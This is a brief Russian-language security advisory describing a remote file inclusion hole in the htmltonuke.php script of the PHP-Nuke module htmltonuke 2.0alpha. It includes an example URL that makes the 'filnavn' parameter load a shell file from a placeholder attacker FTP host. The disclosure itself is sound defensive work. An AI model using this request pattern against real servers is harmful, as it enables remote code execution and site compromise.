Программа: PHP-Nuke Module htmltonuke 2.0alpha

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «filnavn» сценарием htmltonuke.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://www.example.com/nuke_path/htmltonuke.php?filnavn= ftp://user:pass@evilsite.com/public_html/shell.html (or) .htm



Оставить мнение